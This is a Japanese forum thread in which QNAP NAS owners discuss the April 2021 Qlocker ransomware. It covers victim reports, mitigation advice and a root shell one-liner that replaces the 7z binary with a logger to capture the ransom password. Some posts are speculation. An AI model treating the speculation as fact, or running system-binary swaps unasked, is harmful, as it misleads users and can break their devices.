※次スレは>>970踏んだ方が立てて下さい。立てる時は1行目に !extend:checked:vvvvv:1000:512 をお忘れなく。
静音・高速・高性能なNASサーバ、QNAPのアプライアンス製品のスレ
NASを使う際に気になる点、速度・機能・静音などを高いレベルで満たす数少ない製品です
NASは初めての方から、標準搭載の各種機能が目的の方、データ保全とセキュリティが重要な業務用途、
Linuxベースの自宅サーバが欲しい方まで、幅広いユーザに最適です
QNAPは台湾のメーカーですが、マニュアルからユーティリティまで完全日本語対応です
・オフィシャルサイト: https://www.qnap.com/ja-jp/
QNAP NAS Community Forum https://forum.qnap.com/
保証情報 https://www.qnap.com/ja-jp/service_ask/
販売/流通ルートは(海外通販や並行輸入品なども含めて)幾つもあります
正規代理店も複数あるので、故障時の手間や保証サポートのことも考えて、好きな流通経路のものを
関連サイト
・QNAP Club Japan https://www.qnapclub.jp/
関連スレ
NAS総合スレPart31 (LAN接続HDD)
https://mevius.5ch.net/test/read.cgi/hard/1566794151/
前スレ・過去スレ:【静音・高機能NAS】
part49 https://mevius.5ch.net/test/read.cgi/hard/1569008532/
part50 https://mevius.5ch.net/test/read.cgi/hard/1577438170/
part51
https://mevius.5ch.net/test/read.cgi/hard/1583806285/
part52
https://mevius.5ch.net/test/read.cgi/hard/1591197765/
part53
https://mevius.5ch.net/test/read.cgi/hard/1597666162/
【静音・高機能NAS】QNAP part54【自宅サーバ】
https://mevius.5ch.net/test/read.cgi/hard/1607608227/
【静音・高機能NAS】QNAP part55【自宅サーバ】
https://mevius.5ch.net/test/read.cgi/hard/1615087933/
VIPQ2_EXTDAT: checked:vvvvv:1000:512:: EXT was configured
【静音・高機能NAS】QNAP part56【自宅サーバ】
レス数が1000を超えています。これ以上書き込みはできません。
1不明なデバイスさん (オッペケ Srf7-X6xk)
2021/04/22(木) 15:58:45.35ID:gJ+wWukAr2不明なデバイスさん (ワッチョイ d736-5HvV)
2021/04/22(木) 16:13:52.37ID:vnd5ptjM0 Massive Qlocker ransomware attack uses 7zip to encrypt QNAP devices
https://www.bleepingcomputer.com/news/security/massive-qlocker-ransomware-attack-uses-7zip-to-encrypt-qnap-devices/
[RANSOMWARE] 4/20/2021 - QLOCKER
https://forum.qnap.com/viewtopic.php?f=45&;t=160849&sid=8223b1531d52b41ffcd0f23b148495e8
https://www.bleepingcomputer.com/news/security/massive-qlocker-ransomware-attack-uses-7zip-to-encrypt-qnap-devices/
[RANSOMWARE] 4/20/2021 - QLOCKER
https://forum.qnap.com/viewtopic.php?f=45&;t=160849&sid=8223b1531d52b41ffcd0f23b148495e8
3不明なデバイスさん (ワッチョイ 9f7c-ibqb)
2021/04/22(木) 17:42:48.76ID:sxntgV/60 乙乙
4不明なデバイスさん (ワッチョイ d736-5HvV)
2021/04/22(木) 19:21:13.96ID:vnd5ptjM0 Qlockerって、もしかしてスナップショットも消してる?
5不明なデバイスさん (ワッチョイ ffe3-B9Cj)
2021/04/22(木) 20:00:52.59ID:epRYf5ok0 篠スレにIPSルータのログ貼ってる人がいるね
369不明なデバイスさん (ワッチョイ 578e-qkrr)2021/04/22(木) 19:37:56.47ID:CK1QfIRR0
QNAPで公式DDNSリダイレクタから入って来たランサムに殺られてる奴居るようだけどうちのTPにもSTUNでNAT越えようとした奴の履歴がたくさん残ってた
やっぱRT2600acは優秀だ素晴らしい
なくてもFWで弾けてたし俺のQTSバージョンでは問題なかったぽいけどニヤニヤして遊ぶにはもってこい
https://i.imgur.com/FbzliHv.png
369不明なデバイスさん (ワッチョイ 578e-qkrr)2021/04/22(木) 19:37:56.47ID:CK1QfIRR0
QNAPで公式DDNSリダイレクタから入って来たランサムに殺られてる奴居るようだけどうちのTPにもSTUNでNAT越えようとした奴の履歴がたくさん残ってた
やっぱRT2600acは優秀だ素晴らしい
なくてもFWで弾けてたし俺のQTSバージョンでは問題なかったぽいけどニヤニヤして遊ぶにはもってこい
https://i.imgur.com/FbzliHv.png
6不明なデバイスさん (テテンテンテン MM8f-i6G7)
2021/04/22(木) 20:19:40.79ID:g2jSUeJzM QuFirewallアップデート来てるな
7不明なデバイスさん (ワッチョイ d736-5HvV)
2021/04/22(木) 20:58:17.31ID:vnd5ptjM0 とりあえずの対策は
admin無効化
アプリの更新(特にVideo station)
ルータのPnP停止
QNAPのPnP停止
myQNAPCloudの利用停止
くらいかな
admin無効化
アプリの更新(特にVideo station)
ルータのPnP停止
QNAPのPnP停止
myQNAPCloudの利用停止
くらいかな
8不明なデバイスさん (ワッチョイ d7f1-Ho7r)
2021/04/22(木) 21:00:22.68ID:46ROtieb0 他のNASも〜とか見てグダグダしてるうちに7zファイルが増えた
9不明なデバイスさん (ワッチョイ 9fad-IHcq)
2021/04/22(木) 21:01:30.47ID:A5+TDFlc0 前スレでadmin試行でうぎゃー、無効化したけど副作用がーとかさんざんやったから
皆さんadminは無効化済みだと思ってたんだけどそうでもないのかな
皆さんadminは無効化済みだと思ってたんだけどそうでもないのかな
10不明なデバイスさん (ワッチョイ 9736-KDs1)
2021/04/22(木) 21:02:20.34ID:vwfBrxkg0 身代金の支払いは流行りのBitcoin送金?
11不明なデバイスさん (ワッチョイ 9fad-IHcq)
2021/04/22(木) 21:05:51.75ID:A5+TDFlc013不明なデバイスさん (ワッチョイ d710-2xdL)
2021/04/22(木) 21:16:33.30ID:EijXdzw50 453dでメモリ増設する予定ですが、16もあれば十分でしょうか?
仮想マシンとかも使う予定なのですが32あったほうがいいですか?
仮想マシンとかも使う予定なのですが32あったほうがいいですか?
14不明なデバイスさん (ワッチョイ 578e-qkrr)
2021/04/22(木) 21:16:39.83ID:CK1QfIRR0 >>7
myqnapcloudは直接の問題じゃないよ
admin無効化
デフォルトポートの変更
ポートスキャンのブロック
ルータFWでWAN着信の地域限定化
UPnPはNAT FW連携の停止(NAT設定は平気)
myqnapcloudは直接の問題じゃないよ
admin無効化
デフォルトポートの変更
ポートスキャンのブロック
ルータFWでWAN着信の地域限定化
UPnPはNAT FW連携の停止(NAT設定は平気)
15不明なデバイスさん (ワッチョイ 578e-qkrr)
2021/04/22(木) 21:19:21.25ID:CK1QfIRR016不明なデバイスさん (ワッチョイ d736-5HvV)
2021/04/22(木) 21:23:25.91ID:vnd5ptjM0 >>8
暗号化には /usr/local/sbin/7z を使っているので
7zをパスワードを記録するようなコマンドに書き換えるとよい
psコマンドではパスワードは表示されないらしい
https://forum.qnap.com/viewtopic.php?f=45&;t=160849&start=75#p786971
暗号化には /usr/local/sbin/7z を使っているので
7zをパスワードを記録するようなコマンドに書き換えるとよい
psコマンドではパスワードは表示されないらしい
https://forum.qnap.com/viewtopic.php?f=45&;t=160849&start=75#p786971
17不明なデバイスさん (ワッチョイ 7710-Ho7r)
2021/04/22(木) 21:31:25.38ID:RUJvEK3m0 ようやっとTS-253D上のVM(Windows10)でPT3が使えた
pcieパススルー設定後はVMの再起動じゃPT3認識しなくて
VMシャットダウン→VM起動しないとダメだとわかるまで時間がかかったわ
pcieパススルー設定後はVMの再起動じゃPT3認識しなくて
VMシャットダウン→VM起動しないとダメだとわかるまで時間がかかったわ
18不明なデバイスさん (ワッチョイ ff35-VUH3)
2021/04/22(木) 21:32:36.53ID:6ELQ5VCK019不明なデバイスさん (ワッチョイ 9fad-IHcq)
2021/04/22(木) 21:37:31.64ID:A5+TDFlc020不明なデバイスさん (ワッチョイ 978f-gMiP)
2021/04/22(木) 21:41:00.45ID:XdoGEJMy0 ド素人で申し訳ないんだけど、そのランサムウェアはワンタイムパスワード使っててもダメなのか?
21不明なデバイスさん (ワッチョイ d7f1-Ho7r)
2021/04/22(木) 21:42:41.13ID:46ROtieb0 すまない。
焦って再起動してQTS更新しちまった
終わってから調べたら7zファイルは約200個見つかった。
全部20MB以下。
このNASに保管しているすべての20MB以下ファイルが漏れなく7zになってるので
見事にやられた状態。
タイムスタンプ見ると2個増えたんじゃなくて
自部の探し方が悪くて後から見つかっただけっぽい。
200個のファイルのタイムスタンプは1分も差がなかった。
気が付いた時には手遅れだったみたい。
外部との共有用でファイル自体は別の場所にもあるので被害は無いが
やっぱり悔しいな
焦って再起動してQTS更新しちまった
終わってから調べたら7zファイルは約200個見つかった。
全部20MB以下。
このNASに保管しているすべての20MB以下ファイルが漏れなく7zになってるので
見事にやられた状態。
タイムスタンプ見ると2個増えたんじゃなくて
自部の探し方が悪くて後から見つかっただけっぽい。
200個のファイルのタイムスタンプは1分も差がなかった。
気が付いた時には手遅れだったみたい。
外部との共有用でファイル自体は別の場所にもあるので被害は無いが
やっぱり悔しいな
22不明なデバイスさん (ワッチョイ 779b-dTST)
2021/04/22(木) 21:43:50.48ID:OyHYs1RP0 まだ原因は分かってない感じ?
23不明なデバイスさん (ワッチョイ 9f59-1W+b)
2021/04/22(木) 21:53:24.57ID:prhlyD260 やられた…
今気づいて検索してここまで来たよ…
一旦電源落とした
今気づいて検索してここまで来たよ…
一旦電源落とした
24不明なデバイスさん (ワッチョイ d736-5HvV)
2021/04/22(木) 21:58:47.59ID:vnd5ptjM0 フォーラムをいくつか見てるけど、これという原因は特定されていないんだよね
未知の脆弱性や既存の脆弱性を一斉に狙ってるのかも
>>19
書き出したファイルを暗号化されたら駄目だけどねw
loggerで書き出してもいいかも
未知の脆弱性や既存の脆弱性を一斉に狙ってるのかも
>>19
書き出したファイルを暗号化されたら駄目だけどねw
loggerで書き出してもいいかも
25不明なデバイスさん (ワッチョイ 5701-jEYc)
2021/04/22(木) 22:02:19.17ID:B8zjs0qa0 これ電源落としたほうがいいの?
もう結構やられちゃったけど……
admin無効化したら大丈夫かな?
もう結構やられちゃったけど……
admin無効化したら大丈夫かな?
26不明なデバイスさん (ワッチョイ 975f-tdH6)
2021/04/22(木) 22:04:20.34ID:UUQeUHZr0 なんの防御策も行わず外部公開にしてる抜けてる人多いんだなぁ。
27不明なデバイスさん (ワッチョイ 9f3d-9WMT)
2021/04/22(木) 22:12:52.57ID:+fzrol8Y0 被害に遭った人は落ち着いたら構成を教えてほしい。
28不明なデバイスさん (ワッチョイ d736-5HvV)
2021/04/22(木) 22:13:00.25ID:vnd5ptjM0 Response to Qlocker Ransomware Attacks: Take Actions to Secure QNAP NAS
https://www.qnap.com/nl-nl/news/2021/response-to-qlocker-ransomware-attacks-take-actions-to-secure-qnap-nas
https://www.qnap.com/nl-nl/news/2021/response-to-qlocker-ransomware-attacks-take-actions-to-secure-qnap-nas
31不明なデバイスさん (ワッチョイ d752-TCu/)
2021/04/22(木) 22:37:05.47ID:Lb8KwnwH0 かなりの騒ぎになってますね。
自分も今から7z化されてないか確認します、、
自分も今から7z化されてないか確認します、、
32不明なデバイスさん (ワッチョイ 9f3d-9WMT)
2021/04/22(木) 22:41:15.16ID:+fzrol8Y033不明なデバイスさん (ワッチョイ 5701-jEYc)
2021/04/22(木) 22:47:02.93ID:B8zjs0qa034不明なデバイスさん (ワッチョイ 5701-jEYc)
2021/04/22(木) 22:51:20.76ID:B8zjs0qa0 >>16のこれって
cd /usr/local/sbin; printf '#!/bin/sh \necho $@\necho $@>>/mnt/HDA_ROOT/7z.log\nsleep 60000' > 7z.sh; chmod +x 7z.sh; mv 7z 7z.bak; mv 7z.sh 7z;
7zip化が進んでる状態じゃないと意味がないのかな?
もうadmin無効化とかQNAPcloud無効化で止まったっぽいんだけど、それだとパスワード解析することは出来ない?
cd /usr/local/sbin; printf '#!/bin/sh \necho $@\necho $@>>/mnt/HDA_ROOT/7z.log\nsleep 60000' > 7z.sh; chmod +x 7z.sh; mv 7z 7z.bak; mv 7z.sh 7z;
7zip化が進んでる状態じゃないと意味がないのかな?
もうadmin無効化とかQNAPcloud無効化で止まったっぽいんだけど、それだとパスワード解析することは出来ない?
35不明なデバイスさん (ワッチョイ 9fb1-frwl)
2021/04/22(木) 22:57:19.94ID:IPONL9MI0 >>18
認識もするし動くことは動くが、運用中不可解なエラーがでるよ。ストレージエラーでRAID再構築が始まったりとか。海外フォーラムでもわりかし定番。
基本はCPUの上限でやめといた方が吉。
サポートも純正メモリ以外は純正メモリに換装後に問題あるならサポートするよってスタンス
ブログとかの奴らは認識して使えてる風な事を書くがろくに使ってないから問題が出ない。そんなならそもそもそこまでいらんやろ。
認識もするし動くことは動くが、運用中不可解なエラーがでるよ。ストレージエラーでRAID再構築が始まったりとか。海外フォーラムでもわりかし定番。
基本はCPUの上限でやめといた方が吉。
サポートも純正メモリ以外は純正メモリに換装後に問題あるならサポートするよってスタンス
ブログとかの奴らは認識して使えてる風な事を書くがろくに使ってないから問題が出ない。そんなならそもそもそこまでいらんやろ。
36不明なデバイスさん (ワッチョイ 1701-4rDj)
2021/04/22(木) 22:58:33.86ID:nhbrpuoI0 PHPの脆弱性が狙われたんだと、PHPの公式サイトがハッキング被害に遇ったのと
関係してるかもしれんね。
PHPの公式Gitサーバーにハッキング被害--バックドアを仕掛けるコードが見つかる
japan.cnet.com/article/35168549/
ハッカーがPHPの開発者になりすましてソースコードにバックドアを仕込んでいたことが判
gigazine.net/news/20210330-phps-git-server-hacked-backdoors/
関係してるかもしれんね。
PHPの公式Gitサーバーにハッキング被害--バックドアを仕掛けるコードが見つかる
japan.cnet.com/article/35168549/
ハッカーがPHPの開発者になりすましてソースコードにバックドアを仕込んでいたことが判
gigazine.net/news/20210330-phps-git-server-hacked-backdoors/
37不明なデバイスさん (ワッチョイ 9f59-1W+b)
2021/04/22(木) 23:12:50.72ID:prhlyD260 Multimedia直下のVideoPictureMusicが暗号化されてて
Multimedia直下の他のフォルダとかPublicフォルダとかは無事だった
優先してやったりしてるんだろうか
Multimedia直下の他のフォルダとかPublicフォルダとかは無事だった
優先してやったりしてるんだろうか
38不明なデバイスさん (ワッチョイ 9fad-IHcq)
2021/04/22(木) 23:22:39.89ID:A5+TDFlc0 > $ ps --help
(snip)
> This version of ps accepts no options.
(´;ω;`)
いつも ps ax | grep foo 程度の使用で気づいてなかった真実をいま学んだ
後ろが切れる状態から変えようがないんだったらそら見えないか
というかずっと無意味にオプションつけてたよ…
(snip)
> This version of ps accepts no options.
(´;ω;`)
いつも ps ax | grep foo 程度の使用で気づいてなかった真実をいま学んだ
後ろが切れる状態から変えようがないんだったらそら見えないか
というかずっと無意味にオプションつけてたよ…
39不明なデバイスさん (ワッチョイ 9fad-IHcq)
2021/04/22(木) 23:32:34.24ID:A5+TDFlc0 >>2の上の記事
Update 4/22/21: A bug was discovered last night that allowed victims
to recover their 7zip password for free
but was fixed soon after being discovered. More info in update below.
えええ…
Update 4/22/21: A bug was discovered last night that allowed victims
to recover their 7zip password for free
but was fixed soon after being discovered. More info in update below.
えええ…
40不明なデバイスさん (ワッチョイ 975f-dIdK)
2021/04/22(木) 23:53:38.99ID:gJiVTxzI0 先月malware removerがマルウェア発見して、たまたま機種変更しようと思ってたところだったからすぐ機種変更して、セキュリティ関連も見直ししたんだけど、あの時ほったらかしてたら確実にやられてたな…
41不明なデバイスさん (ワッチョイ 5701-jEYc)
2021/04/22(木) 23:57:11.11ID:B8zjs0qa042不明なデバイスさん (ワッチョイ 9a4b-XmRv)
2021/04/23(金) 00:05:04.62ID:HVNi+ZMd0 写真とmp3、自炊データが被害に……
大部分が容量大きめで↑以外殆ど被害がなかったのが救い
とりあえずupnpと二段階認証とCloudとadminの無効化・確認してきた
大部分が容量大きめで↑以外殆ど被害がなかったのが救い
とりあえずupnpと二段階認証とCloudとadminの無効化・確認してきた
43不明なデバイスさん (ワッチョイ dcad-sVZV)
2021/04/23(金) 00:14:15.92ID:iCRSyXOg044不明なデバイスさん (ワッチョイ 74b1-kGtJ)
2021/04/23(金) 00:20:54.34ID:NH2AZhR/0 スナップショットがランサムウェアによって削除されてるしどうすればいいんだ
45不明なデバイスさん (オッペケ Sr10-8zcY)
2021/04/23(金) 00:25:43.98ID:wIzXa8Byr46不明なデバイスさん (ワッチョイ c001-m0US)
2021/04/23(金) 00:33:39.70ID:ZYMa9gv40 winで/mnt/HDA_ROOTにアクセスするにはどうすればいいの?
SSHでファイル移動する以外にGUIでは見れない?
SSHでファイル移動する以外にGUIでは見れない?
47不明なデバイスさん (ワッチョイ dcad-sVZV)
2021/04/23(金) 00:35:55.96ID:iCRSyXOg0 アナウンスから
> QNAP has released an updated version of Malware Remover for operating systems
> such as QTS and QuTS hero to address the ransomware attack.
> If user data is encrypted or being encrypted, the NAS must not be shut down.
> Users should run a malware scan with the latest Malware Remover version immediately,
> and then contact QNAP Technical Support at https://service.qnap.com/.
(雑すぎる和訳)
ランサム対策で Malware Remover を新しくしたんよ
もし暗号化済み・暗号化中だったらNASをシャットダウンしちゃダメ
すぐに最新版の Malware Remover でスキャン、んでからサポートに連絡してね
> QNAP has released an updated version of Malware Remover for operating systems
> such as QTS and QuTS hero to address the ransomware attack.
> If user data is encrypted or being encrypted, the NAS must not be shut down.
> Users should run a malware scan with the latest Malware Remover version immediately,
> and then contact QNAP Technical Support at https://service.qnap.com/.
(雑すぎる和訳)
ランサム対策で Malware Remover を新しくしたんよ
もし暗号化済み・暗号化中だったらNASをシャットダウンしちゃダメ
すぐに最新版の Malware Remover でスキャン、んでからサポートに連絡してね
49不明なデバイスさん (ワッチョイ 4259-X3sy)
2021/04/23(金) 00:39:42.92ID:gJPKi2eM0 もう電源落としちゃったよ…
50不明なデバイスさん (ワッチョイ 8ee3-Nexr)
2021/04/23(金) 00:44:57.97ID:gpybkIlc051不明なデバイスさん (ワッチョイ be08-feca)
2021/04/23(金) 00:48:21.84ID:NsvKeBB/0 先週初NAS購入したのにいきなりコレかよ…
52不明なデバイスさん (ワッチョイ c001-m0US)
2021/04/23(金) 00:52:03.09ID:ZYMa9gv40 誰か/mnt/HDA_ROOT/以下の見方教えて…
共有フォルダはそれ以下の
外してlinuxでマウントしようにも電源落とせないから外せない
共有フォルダはそれ以下の
外してlinuxでマウントしようにも電源落とせないから外せない
53不明なデバイスさん (ワッチョイ c001-m0US)
2021/04/23(金) 00:52:31.73ID:ZYMa9gv40 2行目抜けてた
SMBだと共有フォルダ以下しか見れないよね?
SMBだと共有フォルダ以下しか見れないよね?
54不明なデバイスさん (ワッチョイ 0a02-VIaF)
2021/04/23(金) 01:00:51.63ID:ame0MMOB055不明なデバイスさん (ワッチョイ 8a3d-2tiM)
2021/04/23(金) 01:05:39.08ID:f9jkfur/0 998 名前:不明なデバイスさん (ブーイモ MM9b-9WMT) [sage] :2021/04/22(木) 20:43:55.74 ID:1yFbfocbM
何のウイルスのときか忘れたけどプロセス止めたり再起動するっていう対応が不正解というとんでもないパターンもあったよな。
プロセスが生きてる場合に限りワクチン起動するとメモリから複合鍵を生成できるみたいな。
ほっとくとモリモリ暗号化が進んでくかもしれないし無責任なアドバイスはできないけど。判断むずかしいな。
人の言うことは聞いてみるもんだな。
何のウイルスのときか忘れたけどプロセス止めたり再起動するっていう対応が不正解というとんでもないパターンもあったよな。
プロセスが生きてる場合に限りワクチン起動するとメモリから複合鍵を生成できるみたいな。
ほっとくとモリモリ暗号化が進んでくかもしれないし無責任なアドバイスはできないけど。判断むずかしいな。
人の言うことは聞いてみるもんだな。
56不明なデバイスさん (ワッチョイ 245f-Bx8s)
2021/04/23(金) 01:06:30.07ID:X08T9SNG0 アドミン無効化してないやついるってことか?まじか?
57不明なデバイスさん (オッペケ Sr10-kKRL)
2021/04/23(金) 01:08:25.83ID:wIzXa8Byr58不明なデバイスさん (ワッチョイ b756-m0US)
2021/04/23(金) 01:09:49.63ID:CkMu9Kn80 どうすればいいん?
とりあえず外にはつながってないから放置でもOK?
$ echo 'とけばわかる' | md5sum
8af456005f50587ac913f76ae00eda93 -
とりあえず外にはつながってないから放置でもOK?
$ echo 'とけばわかる' | md5sum
8af456005f50587ac913f76ae00eda93 -
59不明なデバイスさん (ワッチョイ b756-m0US)
2021/04/23(金) 01:10:40.41ID:CkMu9Kn80 $ echo -n '解けばわかる' | md5sum
14980c8b8a96fd9e279796a61cf82c9c -
改行…
14980c8b8a96fd9e279796a61cf82c9c -
改行…
60不明なデバイスさん (ワッチョイ be08-feca)
2021/04/23(金) 01:11:03.67ID:NsvKeBB/0 知識もないのに調子に乗って購入したらこのザマですよ
61不明なデバイスさん (オッペケ Sr10-kKRL)
2021/04/23(金) 01:11:44.10ID:wIzXa8Byr62不明なデバイスさん (ワッチョイ b756-m0US)
2021/04/23(金) 01:13:17.05ID:CkMu9Kn80 まあ流石に外からつながらなけりゃ大丈夫かな…
続報をまとうず
続報をまとうず
63不明なデバイスさん (ワッチョイ 74b1-3riE)
2021/04/23(金) 01:16:18.15ID:NH2AZhR/0 なんかシャットダウンやら再起動したらアウトな空気だよな
シャットダウンしちまったよ
シャットダウンしちまったよ
64不明なデバイスさん (ワッチョイ 8ee3-Nexr)
2021/04/23(金) 01:17:07.37ID:gpybkIlc065不明なデバイスさん (ワッチョイ b701-1mqT)
2021/04/23(金) 01:21:52.31ID:KTx093qa0 クローンやフルバックアップも取ってない時点でNASユーザーとしては失格の部類だろ
NASはテンポラリであって保管場所じゃない
NASはテンポラリであって保管場所じゃない
66不明なデバイスさん (ワッチョイ ae63-1Uyt)
2021/04/23(金) 01:22:24.60ID:IZmgFo7s0 NASがバックアップ手段のうちの一つでしかないんでいくらでも攻撃してくれって感じ
やられたことないけど(´ω`)
やられたことないけど(´ω`)
67不明なデバイスさん (ワッチョイ 4259-X3sy)
2021/04/23(金) 01:26:08.58ID:gJPKi2eM0 ファームウェア更新とシャットダウンやってしまったけど
再起動後もガリガリHDD動いてるっぽいんだけど
まだ暗号化走ってるのかな
再起動後もガリガリHDD動いてるっぽいんだけど
まだ暗号化走ってるのかな
68不明なデバイスさん (ワッチョイ df36-BZjc)
2021/04/23(金) 01:26:10.30ID:Gx4/OGZO0 シャットダウンすればそれ以上暗号化される心配はないけど
動作中であれば>>16でパスワードがわかる
再起動したら暗号化が再び始まったという話もあるので判断が難しい
とりあえずforumの最新情報を見て判断するしか、消された元ファイルを復活させるとか
https://www.bleepingcomputer.com/forums/t/749247/qlocker-qnap-nas-ransomware-encrypting-with-extension-7z/
https://forum.qnap.com/viewtopic.php?f=45&;t=160849&sid=8223b1531d52b41ffcd0f23b148495e8
動作中であれば>>16でパスワードがわかる
再起動したら暗号化が再び始まったという話もあるので判断が難しい
とりあえずforumの最新情報を見て判断するしか、消された元ファイルを復活させるとか
https://www.bleepingcomputer.com/forums/t/749247/qlocker-qnap-nas-ransomware-encrypting-with-extension-7z/
https://forum.qnap.com/viewtopic.php?f=45&;t=160849&sid=8223b1531d52b41ffcd0f23b148495e8
69不明なデバイスさん (ワッチョイ 8a3d-2tiM)
2021/04/23(金) 01:37:25.90ID:f9jkfur/0 最大のセキュリティ対策はやはり冗長化だな。
即FW適用は不具合を拾って死ぬリスクもあるし。
ディスクのロットをバラして筐体冗長はメーカーもバラしたいところ。
あと個人ユースでの倉庫レベルならスナップショットよりも日単位か週単位くらいに世代ずらしてバックアップするほうが良いわ。
元ファイルはデジカメのSDなりPCのローカルなりに1週間分くらい置いておけば良いわけで。
更にいうと月1で外付けHDDにも逃すくらいのことすると落雷サージとかまで考えたらなお良いけどズボラな性格の自分には絶対に無理だわ。
あとはAWSのglacierくらいか。
即FW適用は不具合を拾って死ぬリスクもあるし。
ディスクのロットをバラして筐体冗長はメーカーもバラしたいところ。
あと個人ユースでの倉庫レベルならスナップショットよりも日単位か週単位くらいに世代ずらしてバックアップするほうが良いわ。
元ファイルはデジカメのSDなりPCのローカルなりに1週間分くらい置いておけば良いわけで。
更にいうと月1で外付けHDDにも逃すくらいのことすると落雷サージとかまで考えたらなお良いけどズボラな性格の自分には絶対に無理だわ。
あとはAWSのglacierくらいか。
70不明なデバイスさん (ワッチョイ b756-m0US)
2021/04/23(金) 01:44:27.06ID:CkMu9Kn80 よしもう1台買う決心がついた
問題はHDDがどこにも売ってないことなんだよなあ…
問題はHDDがどこにも売ってないことなんだよなあ…
71不明なデバイスさん (ワッチョイ c001-m0US)
2021/04/23(金) 01:48:30.09ID:ZYMa9gv40 フォーラム見てたんだけどこれってどういう事か分かる人いる?
You might be a lucky exception. My files are encrypted. Check on one file with
/usr/local/sbin/7z.bak l -slt FILENMAE.7z
local/sbin/7z.bak l -slt FILENMAE.7z
You might be a lucky exception. My files are encrypted. Check on one file with
/usr/local/sbin/7z.bak l -slt FILENMAE.7z
local/sbin/7z.bak l -slt FILENMAE.7z
72不明なデバイスさん (ワッチョイ ba7c-xYSY)
2021/04/23(金) 01:59:28.88ID:4bxuXQsT0 やっぱりスナップショットはランサムウェア対策にはならんのだな
そりゃそうだ
QNAP公式サイトでさんざんランサムウェアにはスナップショットを連呼してたから騙されるところだった
そりゃそうだ
QNAP公式サイトでさんざんランサムウェアにはスナップショットを連呼してたから騙されるところだった
73不明なデバイスさん (ワッチョイ 9a4b-XmRv)
2021/04/23(金) 06:06:08.72ID:9URsxrwh0 朝起きたらマルウエアリムーバーがエラーで開かないんだけどみんなは大丈夫?
7473 (ワッチョイ 9a4b-XmRv)
2021/04/23(金) 06:59:45.59ID:9URsxrwh0 アプリ再起動したらいけた模様。
スレ汚し申し訳ない
スレ汚し申し訳ない
75不明なデバイスさん (ワッチョイ 8cbb-BgAO)
2021/04/23(金) 07:18:42.94ID:uXnE/iYQ0 adminの無効化はどうなんだろうな。
簡単なパスワードを設定しなければ関係ない気がする。脆弱性を突かれる場合は関係ないだろうし。
簡単なパスワードを設定しなければ関係ない気がする。脆弱性を突かれる場合は関係ないだろうし。
76不明なデバイスさん (ワントンキン MM94-XmRv)
2021/04/23(金) 07:31:12.03ID:yU4qozcNM IDがわかりづらいだけでも無効化の価値はあるかと
77不明なデバイスさん (ブーイモ MMed-+ZbI)
2021/04/23(金) 07:42:36.54ID:gP3DPAa2M 資格情報はファームにハードコーディングされたパスワードでログインしてるって言う
情報があったんで、もしそうだとするとadminを無効化するのは意味ないね
どうしてそんな仕込みをしてあるのかは不明だけど
情報があったんで、もしそうだとするとadminを無効化するのは意味ないね
どうしてそんな仕込みをしてあるのかは不明だけど
78不明なデバイスさん (ワッチョイ 8a3d-2tiM)
2021/04/23(金) 08:00:32.86ID:f9jkfur/0 スナップショットは十分な容量がある上でやられたのがPC側なら意味はある。
NASがやられると意味なさそう。
NASがやられると意味なさそう。
79不明なデバイスさん (ワッチョイ c2ab-T6Cp)
2021/04/23(金) 08:10:07.17ID:q94oGlmY080不明なデバイスさん (ワッチョイ 3f2d-H1Bl)
2021/04/23(金) 08:45:19.26ID:SIjBCSGD0 degrade modeってなんだよ
動作がとてつもなく遅い やられたのか
動作がとてつもなく遅い やられたのか
81不明なデバイスさん (JP 0Hfd-Cx3h)
2021/04/23(金) 08:51:29.91ID:nxvWd4SbH82不明なデバイスさん (ワッチョイ 0101-xc/R)
2021/04/23(金) 09:13:04.01ID:g1UiajzG0 >>79
双子の脆弱性って解説があるみたいやぞ。
ttps://www.vortez.net/news_story/qnap_nas_users_advised_to_urgently_update_malware_remover_due_to_ransomware.html
> More details on the vulnerabilities exploited can be found at QNAP security advisories
> QSA-21-11 (https://qnap.to/3eq7hy) and QSA-21-13 (https://qnap.to/3dygse).
無線ルーターを最近出たQNAPのQHora-301Wに交換して、QNAPのNASを導入しよう
かと思ってたけど、どちらもまだ導入してなくてよかった。
双子の脆弱性って解説があるみたいやぞ。
ttps://www.vortez.net/news_story/qnap_nas_users_advised_to_urgently_update_malware_remover_due_to_ransomware.html
> More details on the vulnerabilities exploited can be found at QNAP security advisories
> QSA-21-11 (https://qnap.to/3eq7hy) and QSA-21-13 (https://qnap.to/3dygse).
無線ルーターを最近出たQNAPのQHora-301Wに交換して、QNAPのNASを導入しよう
かと思ってたけど、どちらもまだ導入してなくてよかった。
83不明なデバイスさん (ワッチョイ 8cbb-BgAO)
2021/04/23(金) 09:16:56.86ID:uXnE/iYQ0 しかし、疑問なのは、どうやってWAN側からNASまで辿り着いたのか、だよね。この脆弱性を利用するにせよ、NASにはアクセスしないといかんわけで。
84不明なデバイスさん (ワッチョイ 07ca-+ZbI)
2021/04/23(金) 09:19:54.88ID:bICER9Vj0 今回のランサムウェアのいま出てる情報を総括して考えると
・UPnPの脆弱性とHBC3にハードコードされたパスワードを利用して侵入している可能性
・ある容量以下のファイルを全て7zに暗号化する
・解凍パスワードは32桁なので総当り解読は無意味
・プロセスが動作中であればパスワードを抜き出せる可能性あり
こんな感じかな?
・UPnPの脆弱性とHBC3にハードコードされたパスワードを利用して侵入している可能性
・ある容量以下のファイルを全て7zに暗号化する
・解凍パスワードは32桁なので総当り解読は無意味
・プロセスが動作中であればパスワードを抜き出せる可能性あり
こんな感じかな?
85不明なデバイスさん (ブーイモ MMfd-2tiM)
2021/04/23(金) 09:22:54.67ID:uuqRoYoZM86不明なデバイスさん (ワッチョイ c2ab-T6Cp)
2021/04/23(金) 10:06:00.17ID:q94oGlmY087不明なデバイスさん (JP 0Hf8-BCZd)
2021/04/23(金) 10:17:14.84ID:KdMFhYnHH admin無効 関係なし
ポート変更 関係なし
現状できる回避策はUPnPのオフとNASをネットワークから隔離することくらい
ポート変更 関係なし
現状できる回避策はUPnPのオフとNASをネットワークから隔離することくらい
88不明なデバイスさん (ワッチョイ a282-On6t)
2021/04/23(金) 10:20:59.68ID:ZLjYCYnu0 あああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああ
